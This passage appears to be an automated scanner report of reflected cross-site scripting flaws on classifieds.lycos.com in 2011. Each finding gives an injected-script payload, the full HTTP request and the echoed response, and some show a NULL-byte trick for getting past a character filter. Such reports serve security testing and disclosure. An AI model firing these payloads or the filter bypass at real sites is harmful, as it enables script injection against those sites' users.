The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84b59"><script>alert(1)</script>a9b434e50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture-table/dining-table-dining-and-kitchen-2416111088?84b59"><script>alert(1)</script>a9b434e50f4=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:44 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Ftable; path=/ Set-Cookie: classifieds[lastpage][0][name]=Tables+%26+Stands; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-table/dining-table-dining-and-kitchen-2416111088?84b59"><script>alert(1)</script>a9b434e50f4=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e0ee"><script>alert(1)</script>bcff27a0c0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture5e0ee"><script>alert(1)</script>bcff27a0c0c/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:44 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture5e0ee"><script>alert(1)</script>bcff27a0c0c/?mobile=1" rel="nofollow"> ...[SNIP]...
1.113. http://classifieds.lycos.com/sale-furniture/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-furniture/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6893"><script>alert(1)</script>be377872f04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture/?e6893"><script>alert(1)</script>be377872f04=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:04:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:11 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture/?e6893"><script>alert(1)</script>be377872f04=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1851a"><script>alert(1)</script>c657708d1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture1851a"><script>alert(1)</script>c657708d1d/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:11 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17898
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture1851a"><script>alert(1)</script>c657708d1d/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00434ac"><script>alert(1)</script>f0b202c5c34 was submitted in the REST URL parameter 2. This input was echoed as 434ac"><script>alert(1)</script>f0b202c5c34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146%00434ac"><script>alert(1)</script>f0b202c5c34 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146%00434ac"><script>alert(1)</script>f0b202c5c34?mobile=1" rel="nofollow"> ...[SNIP]...
1.116. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c37"><script>alert(1)</script>4e3fb0da995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?34c37"><script>alert(1)</script>4e3fb0da995=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:48 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture; path=/ Set-Cookie: classifieds[lastpage][0][name]=Furniture; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?34c37"><script>alert(1)</script>4e3fb0da995=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6bb"><script>alert(1)</script>fff7f43fb3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniturecc6bb"><script>alert(1)</script>fff7f43fb3b/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniturecc6bb"><script>alert(1)</script>fff7f43fb3b/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d2aae"><script>alert(1)</script>bc97f7c991a was submitted in the REST URL parameter 2. This input was echoed as d2aae"><script>alert(1)</script>bc97f7c991a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818%00d2aae"><script>alert(1)</script>bc97f7c991a HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818%00d2aae"><script>alert(1)</script>bc97f7c991a?mobile=1" rel="nofollow"> ...[SNIP]...
1.119. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea7f"><script>alert(1)</script>c58e7734110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?5ea7f"><script>alert(1)</script>c58e7734110=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:53 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture; path=/ Set-Cookie: classifieds[lastpage][0][name]=Furniture; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23541
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?5ea7f"><script>alert(1)</script>c58e7734110=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d9c"><script>alert(1)</script>ed769d5666e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-home-appliance62d9c"><script>alert(1)</script>ed769d5666e/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:07:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:41 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-home-appliance62d9c"><script>alert(1)</script>ed769d5666e/?mobile=1" rel="nofollow"> ...[SNIP]...
1.121. http://classifieds.lycos.com/sale-home-appliance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-home-appliance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c2b"><script>alert(1)</script>2a3be374949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-home-appliance/?d4c2b"><script>alert(1)</script>2a3be374949=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:07:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:05 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43512
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-home-appliance/?d4c2b"><script>alert(1)</script>2a3be374949=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee25"><script>alert(1)</script>d5547f0ba09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-kid3ee25"><script>alert(1)</script>d5547f0ba09/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-kid3ee25"><script>alert(1)</script>d5547f0ba09/?mobile=1" rel="nofollow"> ...[SNIP]...
1.123. http://classifieds.lycos.com/sale-kid/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-kid/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddce"><script>alert(1)</script>47aa7265f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-kid/?bddce"><script>alert(1)</script>47aa7265f70=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:07:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-kid/?bddce"><script>alert(1)</script>47aa7265f70=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c58d"><script>alert(1)</script>c5b4c6e40fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-music1c58d"><script>alert(1)</script>c5b4c6e40fe/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:20 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-music1c58d"><script>alert(1)</script>c5b4c6e40fe/?mobile=1" rel="nofollow"> ...[SNIP]...
1.125. http://classifieds.lycos.com/sale-music/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-music/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd98"><script>alert(1)</script>6781372f1a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-music/?3cd98"><script>alert(1)</script>6781372f1a2=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:07:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41591
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-music/?3cd98"><script>alert(1)</script>6781372f1a2=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcb3"><script>alert(1)</script>447ff4bb05b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
